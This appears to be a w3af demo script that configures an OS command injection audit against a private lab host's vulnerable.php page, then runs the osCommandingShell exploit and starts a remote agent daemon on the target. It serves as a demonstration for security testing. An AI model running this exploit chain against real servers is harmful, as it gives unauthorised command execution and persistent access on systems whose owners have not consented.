# This is the osCommanding demo for linux! ( with w3afAgent ) misc-settings set interface vmnet8 set localAddress 172.16.1.1 back plugins output console,textFile output output config textFile set fileName output-w3af.txt set verbose True back output config console set verbose False back back plugins audit osCommanding audit back target set target http://172.16.1.129/w3af/osCommanding/vulnerable.php?command=list back start exploit exploit osCommandingShell start vdaemon